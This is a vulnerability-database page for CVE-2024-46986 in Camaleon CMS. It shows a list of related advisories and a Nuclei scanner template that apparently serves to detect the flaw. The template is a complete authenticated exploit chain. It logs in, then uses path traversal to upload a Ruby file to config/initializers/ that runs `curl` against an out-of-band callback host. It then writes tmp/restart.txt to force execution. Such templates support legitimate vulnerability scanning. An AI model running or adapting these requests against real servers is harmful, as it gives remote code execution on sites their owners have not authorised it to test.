| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
| Exploit for Path Traversal in Tuzitio Camaleon_Cms | 22 Sep 202414:27 | – | githubexploit | |
| CVE-2024-46986 | 18 Sep 202420:55 | – | circl | |
| CamaleonCMS 注入漏洞 | 18 Sep 202400:00 | – | cnnvd | |
| CVE-2024-46986 | 18 Sep 202417:14 | – | cve | |
| CVE-2024-46986 Arbitrary file write leading to RCE in Camaleon CMS | 18 Sep 202417:14 | – | cvelist | |
| Camaleon CMS affected by arbitrary file write to RCE (GHSL-2024-182) | 18 Sep 202414:39 | – | github | |
| CVE-2024-46986 | 18 Sep 202418:15 | – | nvd | |
| CVE-2024-46986 Arbitrary file write leading to RCE in Camaleon CMS | 18 Sep 202417:14 | – | osv | |
| GHSA-WMJG-VQHV-Q5P5 Camaleon CMS affected by arbitrary file write to RCE (GHSL-2024-182) | 18 Sep 202414:39 | – | osv | |
| PT-2024-32320 · Unknown · Ruby On Rails +1 | 18 Sep 202400:00 | – | ptsecurity |
id: CVE-2024-46986
info:
name: Camaleon CMS < 2.8.1 Arbitrary File Write to RCE
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
An arbitrary file write vulnerability accessible via the upload method of the MediaController allows authenticated users to write arbitrary files to any location on the web server Camaleon CMS is running on (depending on the permissions of the underlying filesystem). E.g. This can lead to a remote code execution in case an attacker is able to write a Ruby file into the config/initializers/ subfolder of the Ruby on Rails application
impact: |
Authenticated attackers can write arbitrary files to any location on the web server, potentially achieving remote code execution.
remediation: |
Update Camaleon CMS to version 2.8.1 or later.
reference:
- https://github.com/advisories/GHSA-wmjg-vqhv-q5p5
- https://codeql.github.com/codeql-query-help/ruby/rb-path-injection
- https://owasp.org/www-community/attacks/Path_Traversal
- https://github.com/nomi-sec/PoC-in-GitHub
- https://github.com/fkie-cad/nvd-json-data-feeds
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
cvss-score: 9.9
cve-id: CVE-2024-46986
cwe-id: CWE-22,CWE-74
epss-score: 0.35461
epss-percentile: 0.98253
cpe: cpe:2.3:a:tuzitio:camaleon_cms:*:*:*:*:*:*:*:*
metadata:
max-request: 4
verified: true
vendor: tuzitio
product: camaleon_cms
shodan-query: title:"Camaleon CMS"
fofa-query: title="Camaleon CMS"
tags: cve,cve2024,camaleon,intrusive,rce,file-upload,authenticated,vuln
variables:
username: "{{username}}"
password: "{{password}}"
filename: "{{to_lower(rand_text_alpha(12))}}"
flow: http(1) && http(2) && http(3) && http(4)
http:
- raw:
- |
GET /admin/login HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
part: body
internal: true
name: nonce
group: 1
regex:
- 'name="authenticity_token" value="(.*?)"'
- raw:
- |
POST /admin/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
authenticity_token={{nonce}}&user%5Busername%5D={{username}}&user%5Bpassword%5D={{password}}
matchers:
- type: dsl
dsl:
- 'contains(location,"/admin/dashboard")'
internal: true
- raw:
- |
POST /admin/media/upload?actions=false HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data;boundary=----WebKitFormBoundarynJs8ffRP2MgQXiF8
------WebKitFormBoundarynJs8ffRP2MgQXiF8
Content-Disposition: form-data; name="file_upload"; filename="{{filename}}.rb"
Content-Type: text/x-ruby-script
`curl {{interactsh-url}}`
------WebKitFormBoundarynJs8ffRP2MgQXiF8
Content-Disposition: form-data; name="folder"
../../../config/initializers/
------WebKitFormBoundarynJs8ffRP2MgQXiF8
Content-Disposition: form-data; name="skip_auto_crop"
true
------WebKitFormBoundarynJs8ffRP2MgQXiF8--
matchers:
- type: word
part: body
words:
- '{"name":"{{filename}}.rb","folder_path":"../../../config/initializers"'
internal: true
- raw:
- |
POST /admin/media/upload?actions=false HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data;boundary=----WebKitFormBoundarynJs8ffRP2MgQXiF8
------WebKitFormBoundarynJs8ffRP2MgQXiF8
Content-Disposition: form-data; name="file_upload"; filename="restart.txt"
Content-Type: text/x-ruby-script
{{randstr}}
------WebKitFormBoundarynJs8ffRP2MgQXiF8
Content-Disposition: form-data; name="folder"
../../../tmp/
------WebKitFormBoundarynJs8ffRP2MgQXiF8
Content-Disposition: form-data; name="skip_auto_crop"
true
------WebKitFormBoundarynJs8ffRP2MgQXiF8--
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- dns
- type: word
part: body
words:
- '{"name":"restart.txt","folder_path":"../../../tmp"'
# digest: 4a0a0047304502202c6c563bc894cda7fc8df4e9c7273220b90bf849df2d93176b0467c47f24d3ec022100924b031c402fc712d4373f05459cf8c795b177f459820fb1aa665bc76b73d7d2:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation